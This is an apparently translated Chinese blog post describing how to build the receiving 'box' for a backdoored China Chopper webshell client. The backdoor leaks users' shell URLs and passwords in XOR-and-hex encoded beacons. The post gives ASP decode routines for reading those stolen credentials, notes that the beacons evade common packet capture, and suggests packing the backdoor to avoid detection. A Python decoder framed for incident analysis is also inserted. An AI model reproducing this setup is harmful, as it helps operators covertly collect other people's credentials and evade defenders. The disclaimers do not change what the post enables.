Note: this article is for technical research only; do not use it for illegal purposes!
I am sure you have all read the piece on the counterfeit China Chopper official site and its three-million-entry backdoor box (中国菜刀仿冒官网三百万箱子爆菊记), and some of you, like me, must have wondered: how is that Chopper backdoor box actually built? So here is an introduction.
First, the backdoor lives in China Chopper's db.tmp; load the file in WinHex and you can find it.
This is my modified version, used for local testing.
As we all know, software backdoors are usually detected by capturing their network traffic, but this backdoor evades most packet-capture tools:
So if you want to capture its packets you need a less mainstream capture tool.
But even if you do manage to capture the packets, you will find the data is encrypted; without the key decryption routine they are of no use.
A packet containing the shell address, password, configuration and other information:
So the heart of this backdoor box is the decryption function. The core decode function is given below.
Public Function Decode(s)
    Dim i, x
    For i = 1 To Len(s) Step 2 ' rebuild the URL-encoded form ("%XX" per hex pair)
        x = x & "%" & Mid(s, i, 2)
    Next
    x = UrlDecode(x) ' call the URL-decode helper below
    Dim y, a
    For i = 1 To Len(x) Step 2 ' XOR each hex pair back, then re-encode as hex
        a = Int("&H" & Mid(x, i, 2)) ' convert each hex pair to decimal
        a = a Xor 6 ' undo the XOR
        y = y & Chr(a) ' turn the ASCII code back into a character
    Next
    x = ""
    For i = 1 To Len(y) Step 2 ' rebuild the URL-encoded form again
        x = x & "%" & Mid(y, i, 2)
    Next
    x = UrlDecode(x) ' URL-decode
    Decode = x
End Function

Public Function UrlDecode(S) ' URL-decode helper
    Dim I
    For I = 1 To Len(S)
        If Mid(S, I, 1) = "%" Then
            If Int("&H" & Mid(S, I + 1, 2)) > 127 Then
                ' high byte: combine two %XX pairs into one double-byte character
                UrlDecode = UrlDecode & Chr(Int("&H" & Mid(S, I + 1, 2) & Mid(S, I + 4, 2)))
                I = I + 5
            Else
                UrlDecode = UrlDecode & Chr(Int("&H" & Mid(S, I + 1, 2)))
                I = I + 2
            End If
        Else
            UrlDecode = UrlDecode & Mid(S, I, 1)
        End If
    Next
End Function
This is the ASP version of the decode function, published by an expert online (PS: I certainly do not have reverse-engineering skills of that level).
Anyone who needs it can write a PHP version from the source above, or ask me for the full version.
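For an analyst who has captured one of these beacons during an incident and needs to read it (to learn which shell addresses and passwords were exfiltrated), here is a Python re-implementation of the three-layer decode above. It is an added example, not code from the original post: the layers are outer hex, then a per-byte XOR with 6 of the inner hex, then a final hex layer. GBK is assumed for the double-byte branch of UrlDecode, and the sample payloads are constructed; encode_beacon is the inverse and exists only to build test vectors.

```python
import binascii

XOR_KEY = 6  # the single-byte XOR key used in the Decode function above


def _unhex(data: bytes) -> bytes:
    """Hex -> bytes, mapping malformed input (odd length, non-hex) to ValueError."""
    try:
        return binascii.unhexlify(data)
    except binascii.Error as exc:
        raise ValueError(f"malformed hex layer: {exc}") from exc


def decode_beacon(payload: str, encoding: str = "gbk") -> str:
    """Reverse the beacon encoding: hex -> (hex, XOR 6) -> hex -> text.

    encoding="gbk" is an assumption: UrlDecode's >127 branch merges two
    bytes into one character, which matches a double-byte ANSI code page.
    """
    outer = _unhex(payload.strip().encode("ascii"))        # layer 1: outer hex
    xored = bytes(b ^ XOR_KEY for b in _unhex(outer))      # layer 2: hex + XOR
    plain = _unhex(xored)                                  # layer 3: inner hex
    return plain.decode(encoding, errors="replace")


def encode_beacon(text: str, encoding: str = "gbk") -> str:
    """Inverse of decode_beacon; used here only to construct test vectors."""
    inner = binascii.hexlify(text.encode(encoding))        # hex of the text
    xored = bytes(b ^ XOR_KEY for b in inner)              # XOR each hex char
    return binascii.hexlify(binascii.hexlify(xored)).decode("ascii")


# Constructed sample: the two-character string "ok" encoded by hand.
SAMPLE_BEACON = "3330363033303634"

if __name__ == "__main__":
    print(decode_beacon(SAMPLE_BEACON))  # -> ok
    record = "http://example.invalid/shell.asp|pass123|密码"  # constructed
    print(decode_beacon(encode_beacon(record)) == record)     # -> True
```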
Now let's check how this backdoor box performs in use:
It receives the reports perfectly. If you are worried about the backdoor file being caught, you can pack it to make it harder to crack; test that yourself.
Finally, a reminder: this article is for technical reference and research only! Do not use it to do anything illegal! The author accepts no legal responsibility for anything arising from it! After all, there is always someone better out there.
Thanks again to senior classmate Xiaoting (小亭学长) for the help during this work!
As for all the files used here, look for them in our WhiteCellClub team community.
This article was first published on the WeChat public account (WhiteCellClub): "How to build the China Chopper three-million backdoor box" (如何制作中国菜刀三百万后门箱子).